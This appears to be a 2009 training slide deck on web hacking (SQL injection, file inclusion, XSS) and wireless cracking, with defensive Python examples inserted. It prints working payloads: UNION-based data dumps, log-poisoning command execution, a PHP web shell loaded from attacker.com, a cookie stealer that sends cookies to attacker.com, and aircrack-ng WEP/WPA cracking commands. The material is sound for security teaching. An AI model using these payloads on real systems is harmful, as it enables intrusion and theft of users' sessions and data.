Web & Wireless Hacking

Complete Guide on Web & Wireless Hacking

Published in: Technology

  1. IPSECS – WEB & WIRELESS HACKING
     Don “df0x” Anto, Makasar, June 2009, www.ipsecs.com
  2. Content
     • Introduction
     • Web Exploitation
       – SQL Injection
       – File Inclusion
       – XSS
     • Breaking Wireless Infrastructure
       – War Driving
       – Exploiting Wireless Network
  3. Introduction
     • Don “df0x” Anto
     • IT security researcher
     • Hacker?? No, but IT security researcher
     • Contact – we@ipsecs.com
     • URL – http://ipsecs.com – http://kandangjamur.net
     • Bachelor degree in Electrical Engineering
     • Add my Facebook: dj.antoxz@gmail.com
  4. 1st Day, WEB HACKING
  5. Web Exploitation
     • Exploiting web application programming flaws.
     • Programming mistakes always happen.
     • Targets clients or servers.
     • Possible to steal databases and other sensitive information, steal cookies or sessions, execute arbitrary commands, or fully compromise the system.
     • It is easy to do. Google helps you :).
  6. Common Web Exploitation
     • SQL Injection, an attack which targets sensitive information in the database server. Possible to compromise the system.
     • File Inclusion, an attack which is usually used to gain shell access on the remote target.
       – Local file inclusion
       – Remote file inclusion
     • Cross Site Scripting (XSS), an attack which targets the user or client of a vulnerable website.
       – DOM-based
       – Persistent
       – Non-persistent
  7. SQL INJECTION
  8. SQL Injection
     • Injecting malicious SQL queries to take profit.
     • Usually used to bypass login or steal sensitive information from the database. Further attacks can fully compromise the system.
     • User input is not well validated, or there is no sanitation process.
     • All examples and demos below are in PHP/MySQL.
  9. SQL Injection in login form
     • User input in the login form is not validated before being executed in the database.
     • An attacker can send an arbitrary SQL query through the login form and bypass the login process.
     • The attacker can also execute other SQL queries.
  10. Vulnerable Code
     • Example vulnerable code in the login process:
         $pass  = md5($_POST['password']);
         $query = "SELECT * FROM tblUser WHERE username = '" . $_POST['username'] . "' AND password = '" . $pass . "'";
         $q     = mysql_query($query);
     • The username sent from the login form is not validated.
  11. Exploit Login
     • Exploit input:
         username = admin' OR 'a'='a
         password = terserah
     • The SQL query executed by the database server is:
         SELECT * FROM tblUser WHERE username = 'admin' OR 'a'='a' AND password = 'e00b29d5b34c3f78df09d45921c9ec47'
  12. SQL Injection in login form (image slide)
  13. SQL Logic
     • AND has higher precedence than OR, so the database first evaluates:
         'a'='a' AND password = 'e00b29d5b34c3f78df09d45921c9ec47'
     • Its boolean result is FALSE, which leaves:
         username = 'admin' OR FALSE
     • The boolean result is TRUE for the admin row.
     • The attacker has successfully bypassed the login form.
  14. SQL Injection in URI parameter
     • Parameter input in the URI is not validated before being executed in the database.
     • An attacker can send an arbitrary SQL query by modifying the parameter input.
  15. Vulnerable Code
     • Example vulnerable code when taking URI parameters:
         $query = "SELECT * FROM news WHERE id=" . $_GET['aid'];
         $q     = mysql_query($query);
     • The parameter aid taken from the URI is not validated.
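The two vulnerable patterns above (the quoted username of slide 10 and the unquoted numeric id of slide 15) reproduced side by side with their fixed forms, as an added example that is not part of the IPSECS slides. It is written in Python against an in-memory SQLite database standing in for PHP/MySQL; the table and column names come from the slides, the sample rows are constructed. The point it makes beyond the slides: the login bypass only succeeds because AND binds tighter than OR (a non-existent username with the same payload returns nothing), and once the value is passed as a bound parameter (in PHP: a PDO or mysqli prepared statement, which the old mysql_query() API cannot do) the same inputs return no row at all.

```python
"""Added example: SQL injection of slides 10-15 in Python/sqlite3 (not the slides' own code)."""
import hashlib
import sqlite3


def md5_hex(text: str) -> str:
    """Mirror of PHP's md5() as used on slide 10."""
    return hashlib.md5(text.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    """Constructed sample schema: tblUser and news, as named on the slides."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tblUser (username TEXT, password TEXT, namaLengkap TEXT)")
    conn.execute(
        "INSERT INTO tblUser VALUES ('admin', ?, 'Administrator')",
        (md5_hex("constructed-admin-password"),),   # constructed, not the slide's value
    )
    conn.execute("CREATE TABLE news (id INTEGER, title TEXT, body TEXT)")
    conn.executemany(
        "INSERT INTO news VALUES (?, ?, ?)",
        [(1, "First post", "constructed"), (2, "Second post", "constructed")],
    )
    return conn


# --- slides 10-13: login form -------------------------------------------------

def vulnerable_login(conn, username: str, password: str):
    """Same query construction as slide 10: the username is pasted into the SQL text."""
    query = (
        "SELECT * FROM tblUser WHERE username = '" + username
        + "' AND password = '" + md5_hex(password) + "'"
    )
    return conn.execute(query).fetchone()


def safe_login(conn, username: str, password: str):
    """Bound parameters: the input travels as data and is never parsed as SQL."""
    return conn.execute(
        "SELECT * FROM tblUser WHERE username = ? AND password = ?",
        (username, md5_hex(password)),
    ).fetchone()


# --- slides 14-15: numeric URI parameter --------------------------------------

def vulnerable_news(conn, aid: str):
    """Same as slide 15: the id is concatenated into the query without quotes."""
    return conn.execute("SELECT * FROM news WHERE id=" + aid).fetchall()


def safe_news(conn, aid: str):
    """Reject anything that is not a plain integer, then bind it as a parameter."""
    if not aid.isdigit():
        raise ValueError("aid must be a positive integer")
    return conn.execute("SELECT * FROM news WHERE id=?", (int(aid),)).fetchall()


if __name__ == "__main__":
    db = make_db()
    payload = "admin' OR 'a'='a"                       # slide 11
    print(vulnerable_login(db, payload, "terserah"))   # admin row: login bypassed
    print(vulnerable_login(db, "nobody' OR 'a'='a", "terserah"))  # None: AND binds first
    print(safe_login(db, payload, "terserah"))         # None: payload is just a username
    print(vulnerable_news(db, "1 AND 1=1--"), vulnerable_news(db, "1 AND 1=0--"))
    try:
        safe_news(db, "1 AND 1=1--")
    except ValueError as exc:
        print("rejected:", exc)
```

Run it as a script to see the four outcomes; the second call is the precedence rule of slide 13 made visible, since the same payload with an unknown username returns nothing.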
  16. Exploiting SQL Injection
     • Checking the vulnerability using AND logic:
         http://example.com/news.php?aid=1 AND 1=1--
         http://example.com/news.php?aid=1 AND 1=0--
     • Finding the number of fields using UNION SELECT:
         http://example.com/news.php?aid=1 UNION SELECT 1--
         http://example.com/news.php?aid=1 UNION SELECT 1,2--
         http://example.com/news.php?aid=1 UNION SELECT 1,2,3,..,n--
  17. Knowing Number of Fields (image slide)
  18. SQL Injection in URI parameter
     • In this case the table which generates “news” contains 3 fields.
  19. Exploiting SQL Injection
     • Listing the tables in the database:
         http://example.com/news.php?aid=-1 UNION SELECT 1,2,GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=database()--
     • Listing the fields in table tblUser:
         http://example.com/news.php?aid=-1 UNION SELECT 1,2,GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='tblUser'--
       or, with the string written in hex:
         http://example.com/news.php?aid=-1 UNION SELECT 1,2,GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name=0x74626c55736572--
  20. Knowing Tables in DB (image slide)
  21. Exploiting SQL Injection
     • Viewing information in tables:
         http://example.com/news.php?aid=-1 UNION SELECT 1,2,CONCAT_WS(0x2c,username,password,namaLengkap) FROM tblUser--
     • Viewing arbitrary files (if the FILE privilege is granted):
         http://example.com/news.php?aid=-1 UNION SELECT 1,2,LOAD_FILE('/etc/passwd')--
       or, with the string written in hex:
         http://example.com/news.php?aid=-1 UNION SELECT 1,2,LOAD_FILE(0x2f6574632f706173737764)--
  22. Viewing Table Records (image slide)
  23. FILE INCLUSION
  24. File Inclusion
     • Including a malicious or sensitive file to be executed by the server.
     • Usually used to steal sensitive information, execute arbitrary commands, or compromise the system.
     • User input is not well validated, or there is no sanitation process.
     • All examples and demos below are in PHP/MySQL.
  25. Local File Inclusion
     • Including a sensitive file from the local (vulnerable) server to be executed by the server.
     • Usually used to steal sensitive information or execute arbitrary commands. Further attacks can fully compromise the system.
     • User input is not well validated, or there is no sanitation process.
  26. Vulnerable Code
     • Example vulnerable code:
         define('DOCROOT', '/var/www/html/modules');
         $filename = DOCROOT . "/" . $_GET['module'] . ".php";
         include($filename);
     • The parameter module taken from the URI is not validated.
  27. Viewing Sensitive Files
     • Exploit URIs to view sensitive files on the vulnerable system:
         http://example.com/index.php?module=../../../../../../../etc/passwd%00
         http://example.com/index.php?module=../../../../../../../etc/group%00
  28. File /etc/passwd (image slide)
  29. Placing Malicious Log
     • Placing a malicious entry in the Apache log, using telnet to inject a system command:
         $ telnet example.com 80
         Trying example.com...
         Connected to example.com.
         Escape character is '^]'.
         GET /<?php passthru($_GET['cmd']) ?> HTTP/1.1
         Host: example.com
  30. Malicious Log (image slide)
  31. Executing Command
     • Executing a command via the Apache access_log (in case the Apache log is readable):
         http://example.com/index.php?module=../../../../../../../usr/local/apache/logs/access_log%00&cmd=uname -a
         http://example.com/index.php?module=../../../../../../../usr/local/apache/logs/access_log%00&cmd=id
  32. Command “id” (image slide)
  33. Remote File Inclusion
     • Including a file hosted on a remote server (the attacker's server) to be executed by the vulnerable server.
     • Usually used to execute arbitrary commands using a web shell. Further attacks can fully compromise the system.
     • User input is not well validated, or there is no sanitation process.
  34. Vulnerable Code
     • Example vulnerable code:
         $filename = $_GET['page'] . ".php";
         include($filename);
     • The parameter page taken from the URI is not validated.
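A hardened counterpart to the include() patterns of slides 26 and 34, together with a small scanner for the log-poisoning request of slide 29, added here as an example that is not part of the IPSECS slides. It is Python rather than PHP so it runs stand-alone; the DOCROOT value is the one on slide 26, while the allowlist of module names, the log lines and the detection patterns are constructed for the example. The module resolver refuses everything the traversal and NUL-byte URIs of slides 27 and 31 rely on (a name that is not a plain identifier, a name outside the allowlist, a resolved path outside the document root), and the scanner flags the access_log entries those slides would leave behind.

```python
"""Added example: safe module loading (slides 26/34) and log-poisoning detection (slide 29)."""
import os
import re

DOCROOT = "/var/www/html/modules"                 # value from slide 26
ALLOWED_MODULES = {"news", "search", "login"}     # constructed allowlist for the example

# A module name is a plain identifier: no slash, no dot, no NUL byte, no URL scheme.
_MODULE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,32}$")


def resolve_module(module: str, docroot: str = DOCROOT) -> str:
    """Return the file to include, or raise ValueError for anything that is not a
    known module living directly under docroot."""
    docroot = os.path.realpath(docroot)
    if not _MODULE_NAME.fullmatch(module):
        raise ValueError("invalid module name")
    if module not in ALLOWED_MODULES:
        raise ValueError("unknown module")
    path = os.path.realpath(os.path.join(docroot, module + ".php"))
    # Defence in depth: even a name that passed the regex must resolve inside docroot.
    if os.path.commonpath([docroot, path]) != docroot:
        raise ValueError("path escapes docroot")
    return path


def is_remote_include(page: str) -> bool:
    """True if slide 34's $_GET['page'] names a URL that include() would fetch over the network."""
    return re.match(r"^[a-z][a-z0-9+.-]*://", page, re.IGNORECASE) is not None


# Request line inside an Apache common-log-format entry.
_LOG_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>[^"]*) HTTP/')
# Constructed patterns: PHP tags and command functions (slide 29), NUL byte and
# traversal (slides 27 and 31).
_SUSPICIOUS = re.compile(
    r"<\?php|<\?=|passthru\(|system\(|shell_exec\(|%00|\.\./", re.IGNORECASE
)


def scan_access_log(lines):
    """Return the request targets whose content matches a poisoning or traversal pattern."""
    hits = []
    for line in lines:
        m = _LOG_LINE.search(line)
        if m and _SUSPICIOUS.search(m.group("target")):
            hits.append(m.group("target"))
    return hits


# Constructed log lines; the second reproduces the raw request of slide 29.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jun/2009:10:00:00 +0700] "GET /index.php?module=news HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jun/2009:10:00:01 +0700] "GET /<?php passthru($_GET[cmd]) ?> HTTP/1.1" 404 210',
    '10.0.0.9 - - [01/Jun/2009:10:00:02 +0700] "GET /index.php?module=../../../../etc/passwd%00 HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    print(resolve_module("news"))
    for bad in ("../../../../../../../etc/passwd\x00", "../etc/passwd", "news\x00", "http://attacker.com/injek.txt"):
        try:
            resolve_module(bad)
        except ValueError as exc:
            print(repr(bad), "->", exc)
    print(is_remote_include("http://attacker.com/injek.txt"))
    print(scan_access_log(SAMPLE_LOG))
```

The allowlist is the real control; the regex and the realpath check only back it up. On the PHP side the server-wide equivalent of is_remote_include() is the allow_url_include ini directive, which should stay Off so that include() never opens a URL regardless of what the application passes it.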
  35. PHP Shell
     • Simple web shell:
         <?php
         /* Basic PHP web shell injek.txt */
         if (isset($_GET['exec'])) {
             if (!empty($_GET['exec'])) {
                 $cmd = $_GET['exec'];
                 if (function_exists('passthru')) {
                     passthru($cmd);
                 }
             }
         }
         ?>
  36. Public PHP Shell
     • Widely known web shells: r57, c99
     • Commonly used in exploiting remote file inclusion.
  37. r57 (image slide)
  38. Executing Command
     • Injecting commands:
         http://example.com/view.php?page=http://attacker.com/injek.txt&exec=id
         http://example.com/view.php?page=http://attacker.com/injek.txt&exec=ls -al
  39. Command ls -al (image slide)
  40. CROSS SITE SCRIPTING
  41. Cross Site Scripting
     • Inserting HTML/JavaScript code to be executed by the browser of a client which views the vulnerable website.
     • Usually used for stealing cookies from the client computer, phishing, and tricking the user into downloading an arbitrary file.
     • User input is not well validated, or there is no sanitation process.
     • All examples and demos below are in PHP/MySQL.
  42. Cross Site Scripting
     • DOM-based XSS: XSS in a vulnerable file which comes with default installed software.
     • Non-persistent XSS: XSS in a vulnerable web page which can be exploited by tricking the user into clicking a malicious URI. Characteristic: temporary.
     • Persistent XSS: XSS in a vulnerable web page which can be exploited to insert malicious code into the database. Characteristic: permanent.
  43. Vulnerable Code
     • Example vulnerable code:
         echo "<pre> Searching for " . $_GET['key'] . "...</pre><br/>\n";
     • The parameter key sent from the search form is not validated.
  44. Cross Site Scripting
     • Checking whether the page is XSS vulnerable:
         http://example.com/search.php?key=<script>alert('XSS found dude!')</script>
  45. Cross Site Scripting (image slide)
  46. Cookie Stealing
     • Stealing the cookie:
         http://example.com/search.php?key=<script src="http://attacker.com/payload.js"></script>
     • Content of payload.js:
         document.location="http://attacker.com/cookie-save.php?c="+document.cookie
  47. Cookie Grabber
     • Content of cookie-save.php:
         <?php
         /* Cookie stealer */
         $f    = fopen('/tmp/cookie.txt', 'a');
         $date = date("j F, Y, g:i a");
         fwrite($f, "IP Address : " . $_SERVER['REMOTE_ADDR'] . "\n" .
                    "Cookie : " . $_GET['c'] . "\n" .
                    "Date and Time : " . $date . "\n" .
                    "\n\n");
         fclose($f);
         ?>
  48. Hex Encoding
     • Anonymizing the malicious URI using hex (URL) encoding:
         http://example.com/search.php?key=<script src="http://attacker.com/payload.js"></script>
       hex encoded:
         http://example.com/search.php?key=%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%61%74%74%61%63%6b%65%72%2e%63%6f%6d%2f%70%61%79%6c%6f%61%64%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e
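The search page of slide 43 in its vulnerable form and with output encoding, checked against the probe of slide 44, the script include of slide 46 and the hex-encoded URI of slide 48, added here as an example that is not part of the IPSECS slides. Python's html and urllib modules stand in for PHP's htmlspecialchars() and for the web server's URL decoding of the query string; every input string is taken from the slides. What it shows beyond them: the %xx form of slide 48 arrives in $_GET['key'] as exactly the same value as the plain form, so encoding the URI changes nothing about how the server must treat it, and a single html.escape() on output turns both into inert text.

```python
"""Added example: reflected XSS of slides 43-48, vulnerable and encoded output (not the slides' code)."""
import html
from urllib.parse import parse_qs, urlsplit


def render_search_vulnerable(key: str) -> str:
    """Slide 43 as written: the parameter lands in the HTML unchanged."""
    return "<pre> Searching for " + key + "...</pre><br/>\n"


def render_search_safe(key: str) -> str:
    """Same page with HTML output encoding (PHP: htmlspecialchars($key, ENT_QUOTES))."""
    return "<pre> Searching for " + html.escape(key, quote=True) + "...</pre><br/>\n"


def key_from_uri(uri: str) -> str:
    """What $_GET['key'] receives: the server URL-decodes the query string, so the
    %xx form of slide 48 and the plain form of slide 46 are the same value."""
    return parse_qs(urlsplit(uri).query, keep_blank_values=True).get("key", [""])[0]


def contains_markup(rendered: str, fragment: str) -> bool:
    """True if the fragment survived as live markup, i.e. a browser would parse it as a tag."""
    return fragment in rendered


# Inputs from the slides.
PROBE = "<script>alert('XSS found dude!')</script>"                                   # slide 44
PLAIN_URI = 'http://example.com/search.php?key=<script src="http://attacker.com/payload.js"></script>'  # slide 46
HEX_URI = (                                                                             # slide 48
    "http://example.com/search.php?key=%3c%73%63%72%69%70%74%20%73%72%63%3d"
    "%22%68%74%74%70%3a%2f%2f%61%74%74%61%63%6b%65%72%2e%63%6f%6d%2f%70%61%79"
    "%6c%6f%61%64%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e"
)

if __name__ == "__main__":
    print(key_from_uri(HEX_URI) == key_from_uri(PLAIN_URI))      # True: same $_GET['key']
    print(render_search_vulnerable(key_from_uri(HEX_URI)))        # live <script src=...> tag
    print(render_search_safe(key_from_uri(HEX_URI)))              # &lt;script src=&quot;...
    print(render_search_safe(PROBE))
```

The cookie-theft step of slides 46 and 47 depends on document.cookie being readable from script; marking the session cookie HttpOnly (PHP: session.cookie_httponly) removes it from document.cookie even when an injection does get through, so output encoding and the cookie flag are complementary, not alternatives.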
  49. DEMO - Q&A WEB HACKING
  50. THANK YOU!
  51. 2nd Day, WIRELESS HACKING
  52. Wireless Network
     • Now widely used in campuses, government, companies, and many public places.
     • Provides a network for mobile devices.
     • More flexible than a wired network.
     • More insecure than a wired network, so here we go!
  53. War Driving
     • The activity of searching for Wi-Fi wireless networks.
     • Public tools for War Driving:
       – Windows: NetStumbler, Wireshark
       – Linux: Kismet, Aircrack-ng, AirSnort, Wireshark
       – OS X: KisMAC
     • I'm using Linux Ubuntu 8.10.
  54. Kismet
     • Console-based 802.11 wireless network detector and sniffer.
     • It identifies wireless networks by passively sniffing.
     • It already exists in the Ubuntu repository, or you can download it from www.kismetwireless.net.
     • Use apt-get install kismet on Ubuntu; read the README if you want to install from source.
  55. Kismet (image slide)
  56. Kismet (image slide)
  57. Kismet (image slide)
  58. AirSnort
     • GUI-based 802.11 wireless network detector.
     • Designed as a WEP cracker.
     • It isn't available in my Ubuntu repository; download it from www.sourceforge.net.
     • Read the README to install.
  59. aircrack-ng (formerly: aircrack)
     • Console-based 802.11 wireless network detector.
     • Designed as a WEP & WPA-PSK cracker.
     • It already exists in the Ubuntu repository, or you can download it from www.aircrack-ng.org.
     • Use apt-get install aircrack-ng on Ubuntu; read the README if you want to install from source.
  60. aircrack-ng (formerly: aircrack) (image slide)
         airodump wlan0
  61. Wireshark
     • GUI-based network protocol analyzer for UNIX and Windows.
     • The most complete protocol analyzer, supporting many data communication protocols.
     • It already exists in the Ubuntu repository, or you can download it from www.wireshark.org.
     • Use apt-get install wireshark on Ubuntu; read the README if you want to install from source.
  62. Wireshark (image slide)
  63. NetStumbler
     • Best known Windows tool to find wireless networks.
     • It functions like Kismet on Linux or KisMAC on OS X.
     • You can download NetStumbler from www.netstumbler.com
     • Since I use Ubuntu, there's no demo for this tool.
  64. NetStumbler (image slide)
  65. Wireless Network Protection
     • MAC Filtering
     • WEP (Wired Equivalent Privacy)
     • WPA (Wi-Fi Protected Access)
     • WPA2 (Wi-Fi Protected Access 2)
     • Captive Portal
  66. Exploiting Wireless Network
     • Misconfiguration (Human Error)
     • Spoofing
     • Cracking Protection
     • Denial of Service
  67. Misconfiguration
     • Default configuration on the device (access point)
     • Default username & password
     • Default IP address range
     • SNMP public & private communities
     • No encryption enabled
  68. Spoofing & Rogue AP
     • Spoofing the MAC address to bypass MAC filtering.
     • Tools
       – Linux: ifconfig
       – Windows: smac, regedit
     • Creating a rogue AP to trick wireless users, then doing Man in the Middle and sniffing.
     • Tools
       – airsnarf http://airsnarf.shmoo.com
  69. MAC Spoofing (image slide)
  70. WEP Cracking
     • WEP is based on the RC4 algorithm and CRC32.
     • Collect as many weak IVs (Initialization Vectors) as possible to be used in the FMS attack.
     • IV collection is accelerated using traffic injection.
     • Tools: aircrack-ng, AirSnort
  71. WEP Cracking
     • Start the interface in monitor mode.
     • Run kismet to find the target AP.
     • Find an AP with clients connected to it, or do fake authentication to associate with the AP if no client is connected.
     • Inject packets using aireplay-ng
     • Dump packets using airodump-ng
     • Crack the dumped file using aircrack-ng
  72. Dumping Packets
         airodump-ng -c 11 --bssid 00:1c:10:b3:59:38 -w /tmp/output wlan0
  73. Cracking Key
         aircrack-ng -z -b 00:1c:10:b3:59:38 /tmp/output-01.cap
       Key is “abcdef1234”
  74. WPA Cracking
     • WPA is based on the RC4 algorithm + TKIP/AES
     • WPA-PSK can be attacked using a dictionary attack.
     • Of course, it needs a dictionary.
     • Can be cracked offline.
     • Tools: aircrack-ng
  75. WPA Cracking
     • Start the interface in monitor mode.
     • Run kismet to find the target AP.
     • Find an AP which is protected by WPA.
     • Dump packets using airodump-ng
     • Wait for a client to authenticate to the AP, or deauthenticate a client which is connected to the AP.
     • Crack the dumped file using aircrack-ng
  76. WPA Cracking
         airodump-ng -c 11 --bssid 00:21:29:79:50:F1 -w /tmp/out-psk wlan0
  77. WPA Cracking
         aircrack-ng -w /usr/share/dict/words -b 00:21:29:79:50:F1 /tmp/out-psk*.cap
       Key is “miko2009”
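A defender's reading of slides 65-77, added here as an example that is not part of the IPSECS slides: an audit over a wireless survey that flags exactly the conditions those slides exploit (no encryption and default settings from slide 67, WEP from slides 70-73, a pre-shared key from slides 74-77), plus a passphrase check that applies the dictionary test of slide 77 before a key is ever configured. The survey is constructed in the column layout of airodump-ng's CSV export (BSSID in the first column, Privacy, Authentication and ESSID by header name); the two BSSIDs and the key miko2009 come from the slides, while the ESSIDs, the set of default-looking names and the word list are constructed stand-ins for a real survey and /usr/share/dict/words.

```python
"""Added example: audit of a constructed wireless survey against slides 65-77 (not the slides' code)."""
import csv
import io

# Constructed survey in airodump-ng CSV layout (assumption: only BSSID, Privacy,
# Authentication and ESSID are read, so the other columns are filler).
SURVEY_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:1c:10:b3:59:38, 2009-06-01 09:00:00, 2009-06-01 09:10:00, 11, 54, WEP, WEP, , -60, 120, 4000, 0.0.0.0, 7, lab-wep,
00:21:29:79:50:F1, 2009-06-01 09:00:00, 2009-06-01 09:10:00, 11, 54, WPA, TKIP, PSK, -55, 130, 0, 0.0.0.0, 7, lab-psk,
00:11:22:33:44:55, 2009-06-01 09:00:00, 2009-06-01 09:10:00, 6, 54, OPN, , , -70, 90, 0, 0.0.0.0, 7, default,
66:77:88:99:aa:bb, 2009-06-01 09:00:00, 2009-06-01 09:10:00, 1, 54, WPA2, CCMP, PSK, -50, 140, 0, 0.0.0.0, 9, corp-wifi,
"""

# Constructed: ESSIDs that suggest an untouched factory configuration (slide 67).
DEFAULT_ESSIDS = {"default", "linksys", "dlink"}

# Constructed word list standing in for /usr/share/dict/words on slide 77.
WORDLIST = {"password", "miko2009", "welcome1", "letmein"}

FINDINGS = {
    "open": "no encryption at all (slide 67)",
    "wep": "WEP: RC4/CRC32 key recovered from collected IVs (slides 70-73)",
    "psk": "pre-shared key: offline dictionary attack once a handshake is captured (slides 74-77)",
    "default-essid": "ESSID suggests a default device configuration (slide 67)",
}


def audit(csv_text: str) -> dict:
    """Map each access point's BSSID to the list of finding codes that apply to it."""
    report = {}
    reader = csv.DictReader(io.StringIO(csv_text), skipinitialspace=True)
    for row in reader:
        bssid = (row.get("BSSID") or "").strip()
        if not bssid:
            break                                   # end of the access-point section
        privacy = (row.get("Privacy") or "").strip().upper()
        auth = (row.get("Authentication") or "").strip().upper()
        essid = (row.get("ESSID") or "").strip()
        findings = []
        if privacy == "OPN":
            findings.append("open")
        if "WEP" in privacy:
            findings.append("wep")
        if auth == "PSK":                           # WPA and WPA2 alike: the key is the weak point
            findings.append("psk")
        if essid.lower() in DEFAULT_ESSIDS:
            findings.append("default-essid")
        report[bssid] = findings
    return report


def weak_passphrase(psk: str, wordlist=WORDLIST):
    """Return why a WPA/WPA2 passphrase would fall to slide 77's attack, or None if it passes."""
    if len(psk) < 8:                                # 8 characters is the 802.11i minimum
        return "too-short"
    if psk.lower() in wordlist:
        return "in-wordlist"
    return None


if __name__ == "__main__":
    for bssid, codes in audit(SURVEY_CSV).items():
        for code in codes:
            print(bssid, "-", FINDINGS[code])
    print("miko2009 ->", weak_passphrase("miko2009"))     # in-wordlist: slide 77's result
```

The psk finding is deliberately raised for WPA2 as well as WPA: the dictionary step of slide 77 is against the passphrase, not the cipher, so a long random passphrase (or 802.1X instead of a shared key) is the fix, not merely moving from TKIP to CCMP.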
  78. Denial of Service
     • Making the wireless network unavailable.
     • Tools: airjack, void11, aircrack
  79. DEMO - Q&A WIRELESS HACKING
  80. THANK YOU!
